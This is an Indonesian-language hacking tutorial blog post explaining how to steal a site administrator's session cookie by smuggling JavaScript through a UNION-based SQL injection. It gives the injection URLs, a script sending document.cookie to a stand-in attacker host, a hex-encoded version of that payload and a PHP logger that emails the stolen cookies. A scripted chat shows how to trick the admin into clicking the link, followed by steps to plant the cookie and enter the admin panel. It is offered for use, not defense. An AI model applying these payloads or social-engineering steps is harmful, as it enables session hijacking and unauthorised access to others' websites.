Cookie Stealing over SQL Injection
dari SQLInjection kita bisa mencuri cookies dari sang admin. benarkah? benar banget.
klo kita sudah dapet username + password, tapi gak bisa decrypt, dan tetep gak bisa masuk, ada baiknya mencoba trik ini.
tekniknya sama persis dengan deface temporer melalui sql.
contoh
www.embuh.php?id=-1+union+select+1,2,3,4,5--
trus yang keluar adalah angga 3. maka kita inject di angka 3 tersebut. apa yang di inject? bukan command sql, tetapi javascript kayak gini:
<script>window.location=\"http://www.site-attacker.com/log-xss.php?cookie=document.cookie\";</script>
so, kayak gini:
www.embuh.php?id=-1+union+select+1,2,\'<script>window.location=\"http://www.site-attacker.com/log-xss.php?cookie=document.cookie+\'\\nsite:www.embuh.com\'\";</script>\',4,5--
kemudian coba. pasti error. hehehe. maka, kita harus mengenkripsinya kedalam hexa biar bisa dibaca oleh mysql.
convertnya disini:
http://tools.explorecrew.org/enc-dec.php?cat=enc
masukin tuh javascript. hasilnya kayak gini:
266c743b7363726970742667743b77696e646f772e6c6f636174696f6e3d5c2671756f743b687474703a2f2f7777772e736974652d61747461636b65722e636f6d2f6c6f672d7873732e7068703f636f6f6b69653d646f63756d656e742e636f6f6b69655c2671756f743b3b266c743b2f7363726970742667743b
nah, trus masukin ke injeksi sql. jangan lupa di depanya kasih 0x. jadinya kayak gini (ini hanya contoh, sesuaikan dgn kebutuhan):
www.embuh.php?id=-1+union+select+1,2,0x266c743b7363726970742667743b77696e646f772e6c6f636174696f6e3d5c2671756f743b687474703a2f2f7777772e736974652d61747461636b65722e636f6d2f6c6f672d7873732e7068703f636f6f6b69653d646f63756d656e742e636f6f6b69655c2671756f743b3b266c743b2f7363726970742667743b,4,5--
buat ngelog filenya, cukup gini aja:
log-xss.php
$email = \"emailkamu@apaaja.com\";
$headers = \"From: xsslog@gmail.com\\r\\n\" .
\"Reply-To: gak.usah@di.reply.bro\\r\\n\" .
\"X-Mailer: PHP/\".phpversion();
$isi = $_GET[cookie];
@mail($email, \"cookie log\", $isi, $headers);
//jangan lupa redirek ke siet sasaran lagi
header(\"location: http://www.embuh.com\");
nah, trus maen soceng sedikit ke admin, kirim email ke admin ato ngechat via fb/ym/apa aja deh yg penting sampe ke si admin.
A <- aq
M <- mimin
A: hay min...
M: halo bro
A: ada bug tuh di site ente
M: masa sih. coba mana buktinya
A: di bilangin kok gak percaya. coba situ login admin <--- suruh admin login dulu. kan kita mau nyuri cookie nya dia.
M: iya ini udah login
A: nah, coba u buka nih link, keliatan jelas banget ada bug di site ente
A: nih: [url yg tadi udah di injeksi]
M: oke deh. tekape
M: eh kok ngeblank ya? redirek ke halaman laen gitu
A: y ntuh bug nye. segera y perbaiki ya
M: oke deh. tengkiyu :* <--- admin nya agak maho
cookie akan terkirim ke email. buka cookie. misal dapetnya kayak gini:
dlfkjslfkjs984ry09dlskfjdslfjdsfds;fldskfljdsflkjdskl
buka site sasaran. lalu dengan sedikit javascript injection, masukkan cookie ke browser.
javascript:void(document.cookie=\"dlfkjslfkjs984ry09dlskfjdslfjdsfds;fldskfljdsflkjdskl\");
ato dengan tool cookie setter yg u punya deh.
trus buka halaman admin nya. dan, selamat menikmati... :)
Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.